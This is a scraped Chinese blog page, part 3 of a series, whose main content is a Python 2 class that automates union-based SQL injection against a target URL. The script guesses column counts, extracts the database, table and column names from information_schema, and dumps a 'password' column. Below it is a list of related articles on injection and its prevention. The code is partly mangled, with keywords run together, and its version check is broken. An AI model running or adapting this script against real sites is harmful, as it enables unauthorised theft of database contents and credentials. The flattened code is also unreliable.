sql注入python编程_Python编写SQL注入工具(3)

最新推荐文章于 2024-03-28 17:37:32 发布
最新推荐文章于 2024-03-28 17:37:32 发布
阅读量252 收藏
点赞数
文章标签: sql注入python编程

#coding:gb2312

importurllibimportstringimportbinasciiimportreclassmysqlInject():def __init__(self,url):

self.db='database()'self.url=url #待检测的网址

self.dblen=0 #数据库的长度

self.counts=0 #字段数

self.tables=[] #表

self.dbname=''

#检测数据库的版本

defjudgeVersion(self):

page=urllib.urlopen(self.url).read()

sql=string.join([self.url,"%20and%20mid(version(),1,1)=523%"],'')

pagex=urllib.urlopen(self.url).read()if page==pagex:print 'MYSQL版本:>5'

else:print 'MYSQL版本<5'

#检测字段数

defcolumnCounts(self):

page=urllib.urlopen(self.url).read()for n in range(1,100):

sql=string.join([self.url,"%20order%20by%20",str(n)],'')

pagex=urllib.urlopen(sql).read()if n==1:if page==pagex:print '可以使用 order by 猜解'

else:print '不能使用order by 猜解'

break

else:if page!=pagex:

self.counts=n-1

print '字段数:',self.countsbreak

if self.counts==0:print '未能猜解出字段数!'

#爆出当前数据库名,数据库用户

definject5Content(self,sql):

url=self.url+'%20and%201=2%20UNION%20SELECT%20'

for x in range(1,self.counts+1):if x!=1:

url+=','url+='concat(0x25,'url+=sql

url+=',0x25)'pagec=urllib.urlopen(url).read()

reg="%[a-z,0-9,A-Z,.,\-,\\,@,:]*%"regob=re.compile(reg, re.DOTALL)

result=regob.findall(pagec)if len(result)!=0:

strings=result[1]

strings=strings[1:len(strings)-1]returnstringsdefinject5TableNames(self,DB):

url=self.url+'%20and%201=2%20UNION%20SELECT%20'

for x in range(1,self.counts+1):if x!=1:

url+=','url+='concat(0x25,'url+='group_concat(distinct+table_name)'url+=',0x25)'url+='%20from%20information_schema.columns%20where%20table_schema='url+=DB

pagec=urllib.urlopen(url).read()

reg="%[a-z,0-9,A-Z,.,\,,\-,\\,@,:]*%"regob=re.compile(reg, re.DOTALL)

result=regob.findall(pagec)if len(result)!=0:

strings=result[1]

strings=strings[1:len(strings)-1]

s=strings.split(',')returns#猜解字段名

definject5ColumnsName(self,TB):

url=self.url+'%20and%201=2%20UNION%20SELECT%20'

for x in range(1,self.counts+1):if x!=1:

url+=','url+='concat(0x25,'url+='group_concat(distinct+column_name)'url+=',0x25)'url+='%20from%20information_schema.columns%20where%20table_name='url+=TB

pagec=urllib.urlopen(url).read()

reg="%[a-z,0-9,A-Z,.,\,,\-,\\,@,:]*%"regob=re.compile(reg, re.DOTALL)

result=regob.findall(pagec)if len(result)!=0:

strings=result[1]

strings=strings[1:len(strings)-1]

s=strings.split(',')returns#猜字段内容

definject5CountContent(self,TN,CN):

url=self.url+'%20and%201=2%20UNION%20SELECT%20'

for x in range(1,self.counts+1):if x!=1:

url+=','url+='concat(0x25,'url+=CN

url+=',0x25)'url+='%20from%20'url+=TN

pagex=urllib.urlopen(url).read()

reg="%[a-z,0-9,A-Z,.,\,,\-,\\,@,:]*%"regob=re.compile(reg, re.DOTALL)

result=regob.findall(pagex)if len(result)!=0:

strings=result[1]

strings=strings[1:len(strings)-1]print CN,':',strings#如果数据库的版本大于4,可以使用'查'表的方法注入

definject5(self):

d='database()'self.database=self.inject5Content(d)printself.database

database0x=binascii.b2a_hex(self.database)

database0x='0x'+database0xprintdatabase0x

self.inject5TableName(database0x)

self.inject5TableNames(database0x)

tb=self.tables[0]print ''tb=binascii.b2a_hex(tb)

tb='0x'+tbprinttb

self.inject5ColumnsName(tb)

self.inject5CountContent('gly','password')

weixin_39589557
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于MySQLSQL注入攻击(20191202232232).pdf
12-02
MySQLSQL注入攻击(SEC-W05-003.1) 注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,可能 B/S模式应用开发的发展
sql回显注入--python脚本
buffedon的博客
07-15 471
sql回显注入--python脚本1. python基础1.1 数据数据类型数据转换1.2 系统模块2. python web网络请求2.1 请求中的参数3. bool盲注--python编写过程3.1 测试是否能正常请求页面3.2 获取数据--用正则表达式3.3 判断行数3.4 判断回显位置--构造联合查询4. 源代码 联合查询注入python脚本 功能: 页面能否正常请求 判断列数 判断回显位置 1. python基础 1.1 数据 数据类型 整数 浮点数 字符串 c’ “abc”
如何用python开发自动化SQL注入脚本
haoahaoahaoahao的博客
01-11 1983
当得到数据库名长度后,使用?id=1' and substr(database(),1,1)='字母'--+ 判断数据库名。print("%s数据库共有" % db_name + str(tab_num) + "张表")print("%s表下有%d个字段" % (tab_name, dump_num))# print("第%d的长度为%d"%(i,usn_len))# print("第%d的长度为%d"%(i,usn_len))print("[-]第%d张表名为: %s" % (i, tab_name))
SQL注入题型(手工注入+sqlmap)
我了解豹女就像农民伯伯了解大米
06-27 1227
题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件 目录 题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件 首先进行手工注入(用’以及and或者or来进行查看是否可以进行手工注入) 用sqlmap工具进行注入:(-u指定注入的网站链接,--tamper指定防止过滤关键字符,例如空格、union) 发现并没有要找的数据,回归题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。 首先进行手工注入(用’以及and或者or来进行查看是否可以
SQL注入案例及原理
QYbkx974的博客
11-06 423
updatexml(1,concat(0x5e,(select username from cms_users limit 0,1),0x5e),1)//查询username表中第一个用户名。使用bp抓包查看,可以发现登录包为POST请求,而且可以看到我们刚刚输入的用户名和密码,以及请求回显为200。使用bp抓包查看,POST请求包中输入的用户名所包含的特殊字符变成了URL编码,%27为。查询cms_users表的信息,发现有两个用户,这里显示的是第一个用户。所获取的是数字类型,不是字符串类型。
SQL盲注之python脚本自动化注入
菜鸟学安全的博客
12-18 1155
sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入
防范SQL注入研究的课程设计
毕业作品网站
05-31 138
最后,安装 PHP,输入命令"sudo apt-get install php7.0 libapache2-mod-php" , “sudo apt-get install php7.2-mysql”,并进行相应的配置操作。采用 PHP 进行网页编程,main.php 为目标网站主页面,选择 low,improved 两个选项,进入不同安全等级的网页,其中 low 安全等级最低,对输入的用户 ID 不进行任何过滤操作,improved则对输入数据进行特殊字符过滤和是否为数字的检测。1、 攻击测试环境 5。
毕业设计:基于深度学习的SQL注入检测系统 信息安全 python
最新发布
Hai_Lang_IT的博客
03-28 968
毕业设计:基于深度学习的SQL注入检测系统通过深入分析SQL注入攻击的特征和模式,系统可以学习和识别恶意SQL语句,并准确判断其是否存在注入风险。该系统将结合深度学习和计算机安全技术,利用大规模的SQL注入数据集进行模型训练和优化,以实现高效准确的注入检测。本课题为计算机专业、软件工程专业、人工智能专业、大数据专业的毕业生提供了一个创新的方向,结合了深度学习和计算机安全技术,为毕业生提供了一个有意义的研究课题。对于计算机专业、软件工程专业、人工智能专业、大数据专业的毕业生而言,提供了一个具有挑战性的课题。
毕业设计:基于信息安全的SQL注入检测系统 深度学习
毕设帮助,疑难解答,欢迎打扰!
03-23 715
毕业设计:基于信息安全的SQL注入检测系统利用大量真实的SQL注入攻击数据进行训练,实现了对SQL注入攻击的实时监测和防护。这篇博文为计算机毕业设计提供了一个创新的方向,结合了深度学习和计算机视觉技术,为毕业生提供了一个有意义的研究课题。对于计算机专业、软件工程专业、人工智能专业、大数据专业的毕业生而言,提供了一个具有挑战性和创新性的研究课题。无论您对深度学习技术保持浓厚兴趣,还是希望探索机器学习、算法或人工智能的领域的同学,能为您提供灵感和指导。
扫描器篇(二)之python编写sql注入漏洞探测器
weixin_44344395的博客
03-24 4523
sql注入介绍 什么是sql注入 用户输入内容拼接到sql语句中,并执行 Sql注入危害 榨取数据 执行系统命令 向数据库插入代码 绕过验证登录 工具参数获取 工具思路 验证sql注入是否存在 基于错误base_error You have an error in SQL syntax; 获取测试url,对指定参数进行模糊测试FUZZ 工具参数设置 测试...
基于Python+Django的毕业设计-web渗透测试工具(附源码+论文)
岛上程序猿
07-01 3046
本次通过渗透测试的方式可以进行模拟的攻击操作,通过搜集信息、探测、制定攻击策略等方式来对系统进行攻击地域检测,从而实现很好的漏洞检测功能的实现。通过此次的系统开发可以很好的以攻击检测的方式来实现对web的端口、网址进行有效的检测实现。
PHP+MysqlSQL注入源码 下载
12-25
PHP+MysqlSQL注入源码、下载解压部署到环境中去就行了。
学习之sql注入漏洞网址的创建
06-06
学习sql注入,往往需要一个可注入的网址,这篇文章很好的解决了这个问题,我们可以自己创建一个自己用的地址来学习,可以让我们为所欲为。
基于Python的自动化SQL注入工具开发
04-29
随着全球信息化大局的全面铺开,全世界生产力和社会经济的发展都越来越离 不开互联网,大到国家,小到组织和个人,都已经习惯了享受互联网为我们带来的 便利。然而,纷繁复杂的互联网应用背后却暗藏着巨大的安全隐患,据Cybersecurity Ventures预测,2021年因网络攻击造成的经济损失将达到6万亿美元,网络安全不 仅关系到社会经济的各方面,也已经成为关乎国家安全和人民安全的重要因素,而 在众多网络安全漏洞中,SQL注入漏洞以其门槛低、权限高、破坏性强的特点稳居 历年网络安全漏洞排行榜第一名,如何针对SQL注入漏洞进行防范和化解,保障个 人、组织乃至国家的信息安全成为了网络安全领域研究的一个重要问题。同时我们 要注意到,研究SOL漏洞的检测和利用技术有助于帮助网络安全从业者更有针对性 的防范SQL注入攻击,具有相当的理论意义和现实意义。 论文从维护网络安全的角度出发,主要工作如下: (1)首先介绍了SQL注入漏洞在Web端乃至对整体互联网安全造成的威胁, 分析了国内网络安全从业者面临的问题。 (2)介绍和研究了SQL注入漏洞的产生原理和常见的的利用方式,并列举SQL 注入方法,分析和
SQL Injection攻击检测工具
04-25
SQL Injection攻击检测工具,对基于b/s架构的系统很有帮助,分析漏洞,减少攻击。
SQL住入原始脚本_SQL注入python脚本_
10-03
用于SQL注入,打开SQLmap运行脚本。布尔盲注 延时注入
web_scan_code.zip_python_sql injection_sql注入_web scan_webscan
07-15
实现对网页的试错,判断后台数据库类型以及是否存在SQL注入的可能
使用Python防止SQL注入攻击的实现示例
09-16
主要介绍了使用Python防止SQL注入攻击的实现示例,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
python+Django实现防止SQL注入的办法
01-02
先看看那种容易被注入SQL id = 11001 sql = SELECT id, name, age FROM student WHERE id = +id+ cursor = connection.cursor() try: cursor.execute(sql) result = cursor.fetchall() for ...
python sql注入如何防止_PyMySQL如何防止用户遭受sql注入攻击?
05-24
Python中使用PyMySQL库连接MySQL数据库时,可以通过参数化查询的方式来避免SQL注入攻击。 具体来说,就是将SQL语句中的变量替换为占位符,并将变量的值作为参数传递给PyMySQL的execute()方法。例如: ``` import ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值